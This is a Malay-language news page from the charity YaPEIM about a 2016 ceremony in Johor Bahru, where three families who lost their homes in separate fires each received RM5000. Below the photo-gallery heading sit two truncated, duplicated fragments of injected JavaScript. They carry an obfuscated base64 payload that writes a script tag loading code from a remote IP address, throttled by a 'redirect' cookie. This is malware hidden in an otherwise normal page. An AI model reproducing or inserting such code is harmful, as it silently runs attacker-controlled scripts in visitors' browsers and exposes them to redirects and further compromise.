YaPEIM » Majlis Sumbangan Program YaPEIM Prihatin Kepada Mangsa Kebakaran di Johor

Terkini

Majlis Sumbangan Program YaPEIM Prihatin Kepada Mangsa Kebakaran di Johor

Yayasan Pembangunan Anak Yatim Miskin (PEMANGKIN) telah memberi sumbangan kepada 3 buah keluarga yang kehilangan harta benda akibat bencana kebakaran.

JOHOR BAHARU – Majlis sumbangan Program YaPEIM Prihatin anjuran Yayasan Pembangunan Anak Yatim Miskin (PEMANGKIN) telah diadakan bertempat di Hotel Zamsaham, pada 15 Mac 2016. Majlis ini diadakan bertujuan untuk memberi sumbangan kepada 3 buah keluarga yang telah kehilangan rumah dan harta benda akibat bencana kebakaran.

Sumbangan disampaikan oleh Dato’ Abibullah Haji Samsudin, Ketua Pengarah dan Ketua Pegawai Eksekutif Kumpulan YaPEIM. Setiap keluarga menerima sumbangan sebanyak RM5000 sebagai bantuan untuk meringankan beban yang ditanggung oleh mangsa.

Dalam kes kebakaran yang menimpa mangsa Pn Manisah Parkin,60, pada 8 Februari di rumahnya yang bertempat di Kg Parit Puteri Menangis, Benut, Johor, mangsa baru selesai menunaikan solat asar dan terkejut melihat percikan api di tengah rumahnya. Ketika kejadian, suami mangsa, En Tumijan Kassim, 71, tiada di rumah. Api merebak dengan pantas dan mengakibatkan rumah mangsa hangus sekelip mata. Kebakaran pada jam 6 petang ini dikatakan berpunca dari litar pintas.

Dalam kejadian berasingan pada 14 Februari di Kg Melayu Raya, Pontian,Johor, berlaku kebakaran yang berpunca dari litar pintas. Ketika kebakaran, mangsa En Basri Abdullah,64, dan isteri, Pn Tuminah Selamat,60, tiada di rumah. Mangsa yang baru pulang dari menjemput cucunya dari sekolah terkejut apabila melihat bahagian dapur rumahnya terbakar. Dalam kejadian jam 3.30 petang ini, mangsa hanya sempat menyelamatkan beberapa dokumen penting dan beberapa peralatan sahaja.

Dalam kes lain pada 16 Februari di Kg Parit Jerman, Pontian, Johor, kejadian berpunca apabila anak lelaki kepada Pn Buniah Kartiman iaitu Mohd Hirwan Rahmat,31 merupakan seorang orang kurang upaya(OKU) terlupa untuk menutup gas di dapur selepas selesai memanaskan makanan. Api marak dengan begitu cepat dan berlaku litar pintas yang mengakibatkan rumah mangsa musnah dan tidak dapat diselamatkan.

Program YaPEIM Prihatin yang diperkenalkan pada Mac 2012 dan digerakkan secara bersepadu melalui Kembara YaPEIM Prihatin bagi melengkapkan sistem jaringan keselamatan sosial, terutama kepada kumpulan sasar dan golongan miskin, yatim dan mereka yang ditimpa musibah.

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top